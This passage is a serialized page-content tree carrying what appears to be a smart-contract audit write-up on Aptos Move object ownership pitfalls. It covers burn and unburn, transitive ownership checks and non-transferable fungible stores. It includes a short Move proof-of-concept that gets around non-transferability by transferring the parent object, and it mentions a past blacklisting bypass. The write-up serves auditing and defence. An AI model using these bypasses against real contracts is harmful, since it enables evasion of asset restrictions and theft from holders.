{"type":31,"value":66878},{"type":25,"tag":216,"props":68013,"children":68014},{"style":6964},[68015],{"type":31,"value":7026},{"type":25,"tag":216,"props":68017,"children":68018},{"style":6947},[68019],{"type":31,"value":68020},"original_owner",{"type":25,"tag":216,"props":68022,"children":68023},{"style":6964},[68024],{"type":31,"value":66901},{"type":25,"tag":216,"props":68026,"children":68027},{"style":6953},[68028],{"type":31,"value":7438},{"type":25,"tag":216,"props":68030,"children":68031},{"style":7047},[68032],{"type":31,"value":67787},{"type":25,"tag":216,"props":68034,"children":68035},{"style":6964},[68036],{"type":31,"value":68037},"(ENOT_OBJECT_OWNER));\n",{"type":25,"tag":216,"props":68039,"children":68040},{"class":6922,"line":7005},[68041,68045,68050,68054,68058,68062],{"type":25,"tag":216,"props":68042,"children":68043},{"style":6936},[68044],{"type":31,"value":6939},{"type":25,"tag":216,"props":68046,"children":68047},{"style":6947},[68048],{"type":31,"value":68049}," object_addr",{"type":25,"tag":216,"props":68051,"children":68052},{"style":6953},[68053],{"type":31,"value":6956},{"type":25,"tag":216,"props":68055,"children":68056},{"style":6947},[68057],{"type":31,"value":66462},{"type":25,"tag":216,"props":68059,"children":68060},{"style":6953},[68061],{"type":31,"value":179},{"type":25,"tag":216,"props":68063,"children":68064},{"style":6964},[68065],{"type":31,"value":68066},"inner;\n",{"type":25,"tag":216,"props":68068,"children":68069},{"class":6922,"line":7110},[68070,68074,68078,68082,68087,68091,68096,68100,68105,68109,68113],{"type":25,"tag":216,"props":68071,"children":68072},{"style":7047},[68073],{"type":31,"value":67065},{"type":25,"tag":216,"props":68075,"children":68076},{"style":6964},[68077],{"type":31,"value":1850},{"type":25,"tag":216,"props":68079,"children":68080},{"style":6953},[68081],{"type":31,"value":7059},{"type":25,"tag":216,"props":68083,"children":68084},{"style":7047},[68085],{"type":31,"value":68086},"create_signer",{"type":25,"tag":216,"props":68088,"children":68089},{"style":6964},[68090],{"type":31,"value":1850},{"type":25,"tag":216,"props":68092,"children":68093},{"style":6947},[68094],{"type":31,"value":68095},"object_addr",{"type":25,"tag":216,"props":68097,"children":68098},{"style":6964},[68099],{"type":31,"value":5406},{"type":25,"tag":216,"props":68101,"children":68102},{"style":7375},[68103],{"type":31,"value":68104},"TombStone",{"type":25,"tag":216,"props":68106,"children":68107},{"style":6964},[68108],{"type":31,"value":13542},{"type":25,"tag":216,"props":68110,"children":68111},{"style":6947},[68112],{"type":31,"value":68020},{"type":25,"tag":216,"props":68114,"children":68115},{"style":6964},[68116],{"type":31,"value":42798},{"type":25,"tag":216,"props":68118,"children":68119},{"class":6922,"line":7216},[68120,68125,68129,68133],{"type":25,"tag":216,"props":68121,"children":68122},{"style":7047},[68123],{"type":31,"value":68124},"    transfer_raw_inner",{"type":25,"tag":216,"props":68126,"children":68127},{"style":6964},[68128],{"type":31,"value":1850},{"type":25,"tag":216,"props":68130,"children":68131},{"style":6947},[68132],{"type":31,"value":68095},{"type":25,"tag":216,"props":68134,"children":68135},{"style":6964},[68136],{"type":31,"value":68137},", BURN_ADDRESS);\n",{"type":25,"tag":216,"props":68139,"children":68140},{"class":6922,"line":7244},[68141],{"type":25,"tag":216,"props":68142,"children":68143},{"style":6964},[68144],{"type":31,"value":7874},{"type":25,"tag":38,"props":68146,"children":68147},{},[68148,68154,68156,68161,68162,68169,68171,68176],{"type":25,"tag":82,"props":68149,"children":68151},{"className":68150},[],[68152],{"type":31,"value":68153},"unburn",{"type":31,"value":68155}," is a way to restore the previous object owner. In a past audit, this mechanism could be exploited to bypass fungible store owner blacklisting by temporarily setting ownership to the unblacklisted ",{"type":25,"tag":82,"props":68157,"children":68159},{"className":68158},[],[68160],{"type":31,"value":67840},{"type":31,"value":22491},{"type":25,"tag":162,"props":68163,"children":68166},{"href":68164,"rel":68165},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-99.md",[166],[68167],{"type":31,"value":68168},"AIP-99",{"type":31,"value":68170}," is a proposal to roll back the ",{"type":25,"tag":82,"props":68172,"children":68174},{"className":68173},[],[68175],{"type":31,"value":67832},{"type":31,"value":68177}," feature, but previously burned objects will remain restorable.",{"type":25,"tag":34,"props":68179,"children":68180},{},[68181],{"type":25,"tag":38,"props":68182,"children":68183},{},[68184,68186,68190],{"type":31,"value":68185},"This ",{"type":25,"tag":216,"props":68187,"children":68188},{},[68189],{"type":31,"value":68168},{"type":31,"value":68191}," seeks to disable safe object burn, as it caused extra complexity, and sometimes unexpected consequences. As a result of this AIP, users will still be able to unburn their burnt objects, but will not be able to burn any new objects.",{"type":25,"tag":38,"props":68193,"children":68194},{},[68195,68197,68203,68205,68210,68212,68217],{"type":31,"value":68196},"Another important thing is that ",{"type":25,"tag":82,"props":68198,"children":68200},{"className":68199},[],[68201],{"type":31,"value":68202},"fungible_asset::set_untransferable",{"type":31,"value":68204}," can be used to make all new ",{"type":25,"tag":82,"props":68206,"children":68208},{"className":68207},[],[68209],{"type":31,"value":66548},{"type":31,"value":68211}," for this asset untransferable, preventing ownership changes. However, this restriction doesn't apply to the parent object, allowing a transferable parent to be moved even if it owns a non-transferable ",{"type":25,"tag":82,"props":68213,"children":68215},{"className":68214},[],[68216],{"type":31,"value":66044},{"type":31,"value":179},{"type":25,"tag":38,"props":68219,"children":68220},{},[68221,68223,68228,68230,68236,68238,68243,68245,68250],{"type":31,"value":68222},"Do we need to care about this case? We do, because ownership is transitive. If entity X owns an object that owns a ",{"type":25,"tag":82,"props":68224,"children":68226},{"className":68225},[],[68227],{"type":31,"value":66044},{"type":31,"value":68229},", X can withdraw from that store. This is because ",{"type":25,"tag":82,"props":68231,"children":68233},{"className":68232},[],[68234],{"type":31,"value":68235},"fungible_asset::withdraw",{"type":31,"value":68237}," uses ",{"type":25,"tag":82,"props":68239,"children":68241},{"className":68240},[],[68242],{"type":31,"value":67562},{"type":31,"value":68244}," to verify both direct and indirect ownership of the ",{"type":25,"tag":82,"props":68246,"children":68248},{"className":68247},[],[68249],{"type":31,"value":66044},{"type":31,"value":54145},{"type":25,"tag":206,"props":68252,"children":68254},{"className":6915,"code":68253,"language":6914,"meta":7,"style":7},"fun verify_ungated_and_descendant(owner: address, destination: address) acquires ObjectCore {\n        [...]\n    while (owner != current_address) {\n        count = count + 1;\n        [...]\n        assert!(\n            exists\u003CObjectCore>(current_address),\n            error::permission_denied(ENOT_OBJECT_OWNER),\n        );\n        let object = borrow_global\u003CObjectCore>(current_address);\n        current_address = object.owner;\n    };\n}\n",[68255],{"type":25,"tag":82,"props":68256,"children":68257},{"__ignoreMap":7},[68258,68319,68335,68365,68394,68409,68421,68451,68472,68479,68519,68544,68551],{"type":25,"tag":216,"props":68259,"children":68260},{"class":6922,"line":6923},[68261,68265,68270,68274,68278,68282,68286,68290,68295,68299,68303,68307,68311,68315],{"type":25,"tag":216,"props":68262,"children":68263},{"style":6947},[68264],{"type":31,"value":11059},{"type":25,"tag":216,"props":68266,"children":68267},{"style":7047},[68268],{"type":31,"value":68269}," verify_ungated_and_descendant",{"type":25,"tag":216,"props":68271,"children":68272},{"style":6964},[68273],{"type":31,"value":1850},{"type":25,"tag":216,"props":68275,"children":68276},{"style":6947},[68277],{"type":31,"value":19567},{"type":25,"tag":216,"props":68279,"children":68280},{"style":6953},[68281],{"type":31,"value":1472},{"type":25,"tag":216,"props":68283,"children":68284},{"style":6947},[68285],{"type":31,"value":10201},{"type":25,"tag":216,"props":68287,"children":68288},{"style":6964},[68289],{"type":31,"value":7026},{"type":25,"tag":216,"props":68291,"children":68292},{"style":6947},[68293],{"type":31,"value":68294},"destination",{"type":25,"tag":216,"props":68296,"children":68297},{"style":6953},[68298],{"type":31,"value":1472},{"type":25,"tag":216,"props":68300,"children":68301},{"style":6947},[68302],{"type":31,"value":10201},{"type":25,"tag":216,"props":68304,"children":68305},{"style":6964},[68306],{"type":31,"value":7036},{"type":25,"tag":216,"props":68308,"children":68309},{"style":6947},[68310],{"type":31,"value":10295},{"type":25,"tag":216,"props":68312,"children":68313},{"style":7375},[68314],{"type":31,"value":67942},{"type":25,"tag":216,"props":68316,"children":68317},{"style":6964},[68318],{"type":31,"value":7241},{"type":25,"tag":216,"props":68320,"children":68321},{"class":6922,"line":6769},[68322,68327,68331],{"type":25,"tag":216,"props":68323,"children":68324},{"style":6964},[68325],{"type":31,"value":68326},"        [",{"type":25,"tag":216,"props":68328,"children":68329},{"style":6953},[68330],{"type":31,"value":13547},{"type":25,"tag":216,"props":68332,"children":68333},{"style":6964},[68334],{"type":31,"value":15728},{"type":25,"tag":216,"props":68336,"children":68337},{"class":6922,"line":6778},[68338,68343,68347,68351,68356,68361],{"type":25,"tag":216,"props":68339,"children":68340},{"style":6973},[68341],{"type":31,"value":68342},"    while",{"type":25,"tag":216,"props":68344,"children":68345},{"style":6964},[68346],{"type":31,"value":7016},{"type":25,"tag":216,"props":68348,"children":68349},{"style":6947},[68350],{"type":31,"value":19567},{"type":25,"tag":216,"props":68352,"children":68353},{"style":6953},[68354],{"type":31,"value":68355}," !=",{"type":25,"tag":216,"props":68357,"children":68358},{"style":6947},[68359],{"type":31,"value":68360}," current_address",{"type":25,"tag":216,"props":68362,"children":68363},{"style":6964},[68364],{"type":31,"value":18761},{"type":25,"tag":216,"props":68366,"children":68367},{"class":6922,"line":7005},[68368,68373,68377,68382,68386,68390],{"type":25,"tag":216,"props":68369,"children":68370},{"style":6947},[68371],{"type":31,"value":68372},"        count",{"type":25,"tag":216,"props":68374,"children":68375},{"style":6953},[68376],{"type":31,"value":6956},{"type":25,"tag":216,"props":68378,"children":68379},{"style":6947},[68380],{"type":31,"value":68381}," count",{"type":25,"tag":216,"props":68383,"children":68384},{"style":6953},[68385],{"type":31,"value":12858},{"type":25,"tag":216,"props":68387,"children":68388},{"style":6989},[68389],{"type":31,"value":8471},{"type":25,"tag":216,"props":68391,"children":68392},{"style":6964},[68393],{"type":31,"value":6967},{"type":25,"tag":216,"props":68395,"children":68396},{"class":6922,"line":7110},[68397,68401,68405],{"type":25,"tag":216,"props":68398,"children":68399},{"style":6964},[68400],{"type":31,"value":68326},{"type":25,"tag":216,"props":68402,"children":68403},{"style":6953},[68404],{"type":31,"value":13547},{"type":25,"tag":216,"props":68406,"children":68407},{"style":6964},[68408],{"type":31,"value":15728},{"type":25,"tag":216,"props":68410,"children":68411},{"class":6922,"line":7216},[68412,68417],{"type":25,"tag":216,"props":68413,"children":68414},{"style":7047},[68415],{"type":31,"value":68416},"        assert!",{"type":25,"tag":216,"props":68418,"children":68419},{"style":6964},[68420],{"type":31,"value":7420},{"type":25,"tag":216,"props":68422,"children":68423},{"class":6922,"line":7244},[68424,68429,68433,68438,68442,68447],{"type":25,"tag":216,"props":68425,"children":68426},{"style":6947},[68427],{"type":31,"value":68428},"            exists",{"type":25,"tag":216,"props":68430,"children":68431},{"style":6964},[68432],{"type":31,"value":9757},{"type":25,"tag":216,"props":68434,"children":68435},{"style":7375},[68436],{"type":31,"value":68437},"ObjectCore",{"type":25,"tag":216,"props":68439,"children":68440},{"style":6964},[68441],{"type":31,"value":11562},{"type":25,"tag":216,"props":68443,"children":68444},{"style":6947},[68445],{"type":31,"value":68446},"current_address",{"type":25,"tag":216,"props":68448,"children":68449},{"style":6964},[68450],{"type":31,"value":10688},{"type":25,"tag":216,"props":68452,"children":68453},{"class":6922,"line":7257},[68454,68459,68463,68467],{"type":25,"tag":216,"props":68455,"children":68456},{"style":6964},[68457],{"type":31,"value":68458},"            error",{"type":25,"tag":216,"props":68460,"children":68461},{"style":6953},[68462],{"type":31,"value":7438},{"type":25,"tag":216,"props":68464,"children":68465},{"style":7047},[68466],{"type":31,"value":67787},{"type":25,"tag":216,"props":68468,"children":68469},{"style":6964},[68470],{"type":31,"value":68471},"(ENOT_OBJECT_OWNER),\n",{"type":25,"tag":216,"props":68473,"children":68474},{"class":6922,"line":7275},[68475],{"type":25,"tag":216,"props":68476,"children":68477},{"style":6964},[68478],{"type":31,"value":11695},{"type":25,"tag":216,"props":68480,"children":68481},{"class":6922,"line":7296},[68482,68486,68490,68494,68499,68503,68507,68511,68515],{"type":25,"tag":216,"props":68483,"children":68484},{"style":6936},[68485],{"type":31,"value":7011},{"type":25,"tag":216,"props":68487,"children":68488},{"style":6947},[68489],{"type":31,"value":66462},{"type":25,"tag":216,"props":68491,"children":68492},{"style":6953},[68493],{"type":31,"value":6956},{"type":25,"tag":216,"props":68495,"children":68496},{"style":6947},[68497],{"type":31,"value":68498}," borrow_global",{"type":25,"tag":216,"props":68500,"children":68501},{"style":6964},[68502],{"type":31,"value":9757},{"type":25,"tag":216,"props":68504,"children":68505},{"style":7375},[68506],{"type":31,"value":68437},{"type":25,"tag":216,"props":68508,"children":68509},{"style":6964},[68510],{"type":31,"value":11562},{"type":25,"tag":216,"props":68512,"children":68513},{"style":6947},[68514],{"type":31,"value":68446},{"type":25,"tag":216,"props":68516,"children":68517},{"style":6964},[68518],{"type":31,"value":7797},{"type":25,"tag":216,"props":68520,"children":68521},{"class":6922,"line":7305},[68522,68527,68531,68535,68539],{"type":25,"tag":216,"props":68523,"children":68524},{"style":6947},[68525],{"type":31,"value":68526},"        current_address",{"type":25,"tag":216,"props":68528,"children":68529},{"style":6953},[68530],{"type":31,"value":6956},{"type":25,"tag":216,"props":68532,"children":68533},{"style":6947},[68534],{"type":31,"value":66462},{"type":25,"tag":216,"props":68536,"children":68537},{"style":6953},[68538],{"type":31,"value":179},{"type":25,"tag":216,"props":68540,"children":68541},{"style":6964},[68542],{"type":31,"value":68543},"owner;\n",{"type":25,"tag":216,"props":68545,"children":68546},{"class":6922,"line":7557},[68547],{"type":25,"tag":216,"props":68548,"children":68549},{"style":6964},[68550],{"type":31,"value":42960},{"type":25,"tag":216,"props":68552,"children":68553},{"class":6922,"line":7574},[68554],{"type":25,"tag":216,"props":68555,"children":68556},{"style":6964},[68557],{"type":31,"value":7874},{"type":25,"tag":38,"props":68559,"children":68560},{},[68561,68563,68568],{"type":31,"value":68562},"This could allow for bypassing assumptions about ",{"type":25,"tag":82,"props":68564,"children":68566},{"className":68565},[],[68567],{"type":31,"value":66044},{"type":31,"value":68569}," true ownership and its non-transferability.",{"type":25,"tag":206,"props":68571,"children":68573},{"className":6915,"code":68572,"language":6914,"meta":7,"style":7},"public fun untransferable_transfer(caller: &signer, receipient: address) {\n    let constructor_ref = object::create_object(signer::address_of(caller));\n    let object_addr = object::address_from_constructor_ref(&constructor_ref);\n    let store = primary_fungible_store::ensure_primary_store_exists(object_addr, get_metadata());\n\n    object::transfer_raw(caller, object_addr, receipient);\n    //receipient can interact with store by using their signer\n}\n",[68574],{"type":25,"tag":82,"props":68575,"children":68576},{"__ignoreMap":7},[68577,68635,68688,68732,68780,68787,68832,68840],{"type":25,"tag":216,"props":68578,"children":68579},{"class":6922,"line":6923},[68580,68584,68588,68593,68597,68602,68606,68610,68614,68618,68623,68627,68631],{"type":25,"tag":216,"props":68581,"children":68582},{"style":6947},[68583],{"type":31,"value":65643},{"type":25,"tag":216,"props":68585,"children":68586},{"style":6947},[68587],{"type":31,"value":10158},{"type":25,"tag":216,"props":68589,"children":68590},{"style":7047},[68591],{"type":31,"value":68592}," untransferable_transfer",{"type":25,"tag":216,"props":68594,"children":68595},{"style":6964},[68596],{"type":31,"value":1850},{"type":25,"tag":216,"props":68598,"children":68599},{"style":6947},[68600],{"type":31,"value":68601},"caller",{"type":25,"tag":216,"props":68603,"children":68604},{"style":6953},[68605],{"type":31,"value":1472},{"type":25,"tag":216,"props":68607,"children":68608},{"style":6953},[68609],{"type":31,"value":11093},{"type":25,"tag":216,"props":68611,"children":68612},{"style":6947},[68613],{"type":31,"value":11098},{"type":25,"tag":216,"props":68615,"children":68616},{"style":6964},[68617],{"type":31,"value":7026},{"type":25,"tag":216,"props":68619,"children":68620},{"style":6947},[68621],{"type":31,"value":68622},"receipient",{"type":25,"tag":216,"props":68624,"children":68625},{"style":6953},[68626],{"type":31,"value":1472},{"type":25,"tag":216,"props":68628,"children":68629},{"style":6947},[68630],{"type":31,"value":10201},{"type":25,"tag":216,"props":68632,"children":68633},{"style":6964},[68634],{"type":31,"value":18761},{"type":25,"tag":216,"props":68636,"children":68637},{"class":6922,"line":6769},[68638,68642,68647,68651,68655,68659,68664,68668,68672,68676,68680,68684],{"type":25,"tag":216,"props":68639,"children":68640},{"style":6936},[68641],{"type":31,"value":6939},{"type":25,"tag":216,"props":68643,"children":68644},{"style":6947},[68645],{"type":31,"value":68646}," constructor_ref",{"type":25,"tag":216,"props":68648,"children":68649},{"style":6953},[68650],{"type":31,"value":6956},{"type":25,"tag":216,"props":68652,"children":68653},{"style":6964},[68654],{"type":31,"value":66462},{"type":25,"tag":216,"props":68656,"children":68657},{"style":6953},[68658],{"type":31,"value":7438},{"type":25,"tag":216,"props":68660,"children":68661},{"style":7047},[68662],{"type":31,"value":68663},"create_object",{"type":25,"tag":216,"props":68665,"children":68666},{"style":6964},[68667],{"type":31,"value":11152},{"type":25,"tag":216,"props":68669,"children":68670},{"style":6953},[68671],{"type":31,"value":7438},{"type":25,"tag":216,"props":68673,"children":68674},{"style":7047},[68675],{"type":31,"value":11161},{"type":25,"tag":216,"props":68677,"children":68678},{"style":6964},[68679],{"type":31,"value":1850},{"type":25,"tag":216,"props":68681,"children":68682},{"style":6947},[68683],{"type":31,"value":68601},{"type":25,"tag":216,"props":68685,"children":68686},{"style":6964},[68687],{"type":31,"value":11175},{"type":25,"tag":216,"props":68689,"children":68690},{"class":6922,"line":6778},[68691,68695,68699,68703,68707,68711,68716,68720,68724,68728],{"type":25,"tag":216,"props":68692,"children":68693},{"style":6936},[68694],{"type":31,"value":6939},{"type":25,"tag":216,"props":68696,"children":68697},{"style":6947},[68698],{"type":31,"value":68049},{"type":25,"tag":216,"props":68700,"children":68701},{"style":6953},[68702],{"type":31,"value":6956},{"type":25,"tag":216,"props":68704,"children":68705},{"style":6964},[68706],{"type":31,"value":66462},{"type":25,"tag":216,"props":68708,"children":68709},{"style":6953},[68710],{"type":31,"value":7438},{"type":25,"tag":216,"props":68712,"children":68713},{"style":7047},[68714],{"type":31,"value":68715},"address_from_constructor_ref",{"type":25,"tag":216,"props":68717,"children":68718},{"style":6964},[68719],{"type":31,"value":1850},{"type":25,"tag":216,"props":68721,"children":68722},{"style":6953},[68723],{"type":31,"value":7059},{"type":25,"tag":216,"props":68725,"children":68726},{"style":6947},[68727],{"type":31,"value":66896},{"type":25,"tag":216,"props":68729,"children":68730},{"style":6964},[68731],{"type":31,"value":7797},{"type":25,"tag":216,"props":68733,"children":68734},{"class":6922,"line":7005},[68735,68739,68743,68747,68752,68756,68760,68764,68768,68772,68776],{"type":25,"tag":216,"props":68736,"children":68737},{"style":6936},[68738],{"type":31,"value":6939},{"type":25,"tag":216,"props":68740,"children":68741},{"style":6947},[68742],{"type":31,"value":9782},{"type":25,"tag":216,"props":68744,"children":68745},{"style":6953},[68746],{"type":31,"value":6956},{"type":25,"tag":216,"props":68748,"children":68749},{"style":6964},[68750],{"type":31,"value":68751}," primary_fungible_store",{"type":25,"tag":216,"props":68753,"children":68754},{"style":6953},[68755],{"type":31,"value":7438},{"type":25,"tag":216,"props":68757,"children":68758},{"style":7047},[68759],{"type":31,"value":66788},{"type":25,"tag":216,"props":68761,"children":68762},{"style":6964},[68763],{"type":31,"value":1850},{"type":25,"tag":216,"props":68765,"children":68766},{"style":6947},[68767],{"type":31,"value":68095},{"type":25,"tag":216,"props":68769,"children":68770},{"style":6964},[68771],{"type":31,"value":7026},{"type":25,"tag":216,"props":68773,"children":68774},{"style":7047},[68775],{"type":31,"value":66744},{"type":25,"tag":216,"props":68777,"children":68778},{"style":6964},[68779],{"type":31,"value":19382},{"type":25,"tag":216,"props":68781,"children":68782},{"class":6922,"line":7110},[68783],{"type":25,"tag":216,"props":68784,"children":68785},{"emptyLinePlaceholder":16},[68786],{"type":31,"value":7642},{"type":25,"tag":216,"props":68788,"children":68789},{"class":6922,"line":7216},[68790,68795,68799,68804,68808,68812,68816,68820,68824,68828],{"type":25,"tag":216,"props":68791,"children":68792},{"style":6964},[68793],{"type":31,"value":68794},"    object",{"type":25,"tag":216,"props":68796,"children":68797},{"style":6953},[68798],{"type":31,"value":7438},{"type":25,"tag":216,"props":68800,"children":68801},{"style":7047},[68802],{"type":31,"value":68803},"transfer_raw",{"type":25,"tag":216,"props":68805,"children":68806},{"style":6964},[68807],{"type":31,"value":1850},{"type":25,"tag":216,"props":68809,"children":68810},{"style":6947},[68811],{"type":31,"value":68601},{"type":25,"tag":216,"props":68813,"children":68814},{"style":6964},[68815],{"type":31,"value":7026},{"type":25,"tag":216,"props":68817,"children":68818},{"style":6947},[68819],{"type":31,"value":68095},{"type":25,"tag":216,"props":68821,"children":68822},{"style":6964},[68823],{"type":31,"value":7026},{"type":25,"tag":216,"props":68825,"children":68826},{"style":6947},[68827],{"type":31,"value":68622},{"type":25,"tag":216,"props":68829,"children":68830},{"style":6964},[68831],{"type":31,"value":7797},{"type":25,"tag":216,"props":68833,"children":68834},{"class":6922,"line":7244},[68835],{"type":25,"tag":216,"props":68836,"children":68837},{"style":6927},[68838],{"type":31,"value":68839},"    //receipient can interact with store by using their signer\n",{"type":25,"tag":216,"props":68841,"children":68842},{"class":6922,"line":7257},[68843],{"type":25,"tag":216,"props":68844,"children":68845},{"style":6964},[68846],{"type":31,"value":7874},{"type":25,"tag":38,"props":68848,"children":68849},{},[68850,68852,68859],{"type":31,"value":68851},"The ownership transfer issue also showed up during our review of the fungible asset standard, where we identified an interesting ",{"type":25,"tag":162,"props":68853,"children":68856},{"href":68854,"rel":68855},"https://github.com/aptos-labs/aptos-core/commit/e8c5e4bd03930d25f0dbec9529680fac36eb2fa6",[166],[68857],{"type":31,"value":68858},"edge case",{"type":31,"value":68860}," involving the transfer of a non-transferable fungible store.",{"type":25,"tag":206,"props":68862,"children":68864},{"className":6915,"code":68863,"language":6914,"meta":7,"style":7},"public fun transfer_with_ref(ref: LinearTransferRef, to: address) acquires ObjectCore {\n    assert!(!exists\u003CUntransferable>(ref.self), error::permission_denied(ENOT_MOVABLE));\n    let object = borrow_global_mut\u003CObjectCore>(ref.self);\n    assert!(\n        object.owner == ref.owner,\n        error::permission_denied(ENOT_OBJECT_OWNER),\n    );\n    \n    [...]\n    \n    object.owner = to;\n}\n",[68865],{"type":25,"tag":82,"props":68866,"children":68867},{"__ignoreMap":7},[68868,68933,68994,69041,69052,69087,69107,69114,69121,69136,69143,69171],{"type":25,"tag":216,"props":68869,"children":68870},{"class":6922,"line":6923},[68871,68875,68879,68884,68888,68892,68896,68901,68905,68909,68913,68917,68921,68925,68929],{"type":25,"tag":216,"props":68872,"children":68873},{"style":6947},[68874],{"type":31,"value":65643},{"type":25,"tag":216,"props":68876,"children":68877},{"style":6947},[68878],{"type":31,"value":10158},{"type":25,"tag":216,"props":68880,"children":68881},{"style":7047},[68882],{"type":31,"value":68883}," transfer_with_ref",{"type":25,"tag":216,"props":68885,"children":68886},{"style":6964},[68887],{"type":31,"value":1850},{"type":25,"tag":216,"props":68889,"children":68890},{"style":6936},[68891],{"type":31,"value":67305},{"type":25,"tag":216,"props":68893,"children":68894},{"style":6953},[68895],{"type":31,"value":1472},{"type":25,"tag":216,"props":68897,"children":68898},{"style":7375},[68899],{"type":31,"value":68900}," LinearTransferRef",{"type":25,"tag":216,"props":68902,"children":68903},{"style":6964},[68904],{"type":31,"value":7026},{"type":25,"tag":216,"props":68906,"children":68907},{"style":6947},[68908],{"type":31,"value":36690},{"type":25,"tag":216,"props":68910,"children":68911},{"style":6953},[68912],{"type":31,"value":1472},{"type":25,"tag":216,"props":68914,"children":68915},{"style":6947},[68916],{"type":31,"value":10201},{"type":25,"tag":216,"props":68918,"children":68919},{"style":6964},[68920],{"type":31,"value":7036},{"type":25,"tag":216,"props":68922,"children":68923},{"style":6947},[68924],{"type":31,"value":10295},{"type":25,"tag":216,"props":68926,"children":68927},{"style":7375},[68928],{"type":31,"value":67942},{"type":25,"tag":216,"props":68930,"children":68931},{"style":6964},[68932],{"type":31,"value":7241},{"type":25,"tag":216,"props":68934,"children":68935},{"class":6922,"line":6769},[68936,68940,68944,68948,68952,68956,68961,68965,68969,68973,68977,68981,68985,68989],{"type":25,"tag":216,"props":68937,"children":68938},{"style":7047},[68939],{"type":31,"value":66312},{"type":25,"tag":216,"props":68941,"children":68942},{"style":6964},[68943],{"type":31,"value":1850},{"type":25,"tag":216,"props":68945,"children":68946},{"style":6953},[68947],{"type":31,"value":24581},{"type":25,"tag":216,"props":68949,"children":68950},{"style":6947},[68951],{"type":31,"value":10656},{"type":25,"tag":216,"props":68953,"children":68954},{"style":6964},[68955],{"type":31,"value":9757},{"type":25,"tag":216,"props":68957,"children":68958},{"style":7375},[68959],{"type":31,"value":68960},"Untransferable",{"type":25,"tag":216,"props":68962,"children":68963},{"style":6964},[68964],{"type":31,"value":11562},{"type":25,"tag":216,"props":68966,"children":68967},{"style":6936},[68968],{"type":31,"value":67305},{"type":25,"tag":216,"props":68970,"children":68971},{"style":6953},[68972],{"type":31,"value":179},{"type":25,"tag":216,"props":68974,"children":68975},{"style":6936},[68976],{"type":31,"value":17670},{"type":25,"tag":216,"props":68978,"children":68979},{"style":6964},[68980],{"type":31,"value":66901},{"type":25,"tag":216,"props":68982,"children":68983},{"style":6953},[68984],{"type":31,"value":7438},{"type":25,"tag":216,"props":68986,"children":68987},{"style":7047},[68988],{"type":31,"value":67787},{"type":25,"tag":216,"props":68990,"children":68991},{"style":6964},[68992],{"type":31,"value":68993},"(ENOT_MOVABLE));\n",{"type":25,"tag":216,"props":68995,"children":68996},{"class":6922,"line":6778},[68997,69001,69005,69009,69013,69017,69021,69025,69029,69033,69037],{"type":25,"tag":216,"props":68998,"children":68999},{"style":6936},[69000],{"type":31,"value":6939},{"type":25,"tag":216,"props":69002,"children":69003},{"style":6947},[69004],{"type":31,"value":66462},{"type":25,"tag":216,"props":69006,"children":69007},{"style":6953},[69008],{"type":31,"value":6956},{"type":25,"tag":216,"props":69010,"children":69011},{"style":6947},[69012],{"type":31,"value":11548},{"type":25,"tag":216,"props":69014,"children":69015},{"style":6964},[69016],{"type":31,"value":9757},{"type":25,"tag":216,"props":69018,"children":69019},{"style":7375},[69020],{"type":31,"value":68437},{"type":25,"tag":216,"props":69022,"children":69023},{"style":6964},[69024],{"type":31,"value":11562},{"type":25,"tag":216,"props":69026,"children":69027},{"style":6936},[69028],{"type":31,"value":67305},{"type":25,"tag":216,"props":69030,"children":69031},{"style":6953},[69032],{"type":31,"value":179},{"type":25,"tag":216,"props":69034,"children":69035},{"style":6936},[69036],{"type":31,"value":17670},{"type":25,"tag":216,"props":69038,"children":69039},{"style":6964},[69040],{"type":31,"value":7797},{"type":25,"tag":216,"props":69042,"children":69043},{"class":6922,"line":7005},[69044,69048],{"type":25,"tag":216,"props":69045,"children":69046},{"style":7047},[69047],{"type":31,"value":66312},{"type":25,"tag":216,"props":69049,"children":69050},{"style":6964},[69051],{"type":31,"value":7420},{"type":25,"tag":216,"props":69053,"children":69054},{"class":6922,"line":7110},[69055,69060,69064,69069,69073,69078,69082],{"type":25,"tag":216,"props":69056,"children":69057},{"style":6947},[69058],{"type":31,"value":69059},"        object",{"type":25,"tag":216,"props":69061,"children":69062},{"style":6953},[69063],{"type":31,"value":179},{"type":25,"tag":216,"props":69065,"children":69066},{"style":6964},[69067],{"type":31,"value":69068},"owner ",{"type":25,"tag":216,"props":69070,"children":69071},{"style":6953},[69072],{"type":31,"value":12528},{"type":25,"tag":216,"props":69074,"children":69075},{"style":6936},[69076],{"type":31,"value":69077}," ref",{"type":25,"tag":216,"props":69079,"children":69080},{"style":6953},[69081],{"type":31,"value":179},{"type":25,"tag":216,"props":69083,"children":69084},{"style":6964},[69085],{"type":31,"value":69086},"owner,\n",{"type":25,"tag":216,"props":69088,"children":69089},{"class":6922,"line":7216},[69090,69095,69099,69103],{"type":25,"tag":216,"props":69091,"children":69092},{"style":6964},[69093],{"type":31,"value":69094},"        error",{"type":25,"tag":216,"props":69096,"children":69097},{"style":6953},[69098],{"type":31,"value":7438},{"type":25,"tag":216,"props":69100,"children":69101},{"style":7047},[69102],{"type":31,"value":67787},{"type":25,"tag":216,"props":69104,"children":69105},{"style":6964},[69106],{"type":31,"value":68471},{"type":25,"tag":216,"props":69108,"children":69109},{"class":6922,"line":7244},[69110],{"type":25,"tag":216,"props":69111,"children":69112},{"style":6964},[69113],{"type":31,"value":47623},{"type":25,"tag":216,"props":69115,"children":69116},{"class":6922,"line":7257},[69117],{"type":25,"tag":216,"props":69118,"children":69119},{"style":6964},[69120],{"type":31,"value":65754},{"type":25,"tag":216,"props":69122,"children":69123},{"class":6922,"line":7275},[69124,69128,69132],{"type":25,"tag":216,"props":69125,"children":69126},{"style":6964},[69127],{"type":31,"value":66686},{"type":25,"tag":216,"props":69129,"children":69130},{"style":6953},[69131],{"type":31,"value":13547},{"type":25,"tag":216,"props":69133,"children":69134},{"style":6964},[69135],{"type":31,"value":15728},{"type":25,"tag":216,"props":69137,"children":69138},{"class":6922,"line":7296},[69139],{"type":25,"tag":216,"props":69140,"children":69141},{"style":6964},[69142],{"type":31,"value":65754},{"type":25,"tag":216,"props":69144,"children":69145},{"class":6922,"line":7305},[69146,69150,69154,69158,69162,69167],{"type":25,"tag":216,"props":69147,"children":69148},{"style":6947},[69149],{"type":31,"value":68794},{"type":25,"tag":216,"props":69151,"children":69152},{"style":6953},[69153],{"type":31,"value":179},{"type":25,"tag":216,"props":69155,"children":69156},{"style":6964},[69157],{"type":31,"value":69068},{"type":25,"tag":216,"props":69159,"children":69160},{"style":6953},[69161],{"type":31,"value":266},{"type":25,"tag":216,"props":69163,"children":69164},{"style":6947},[69165],{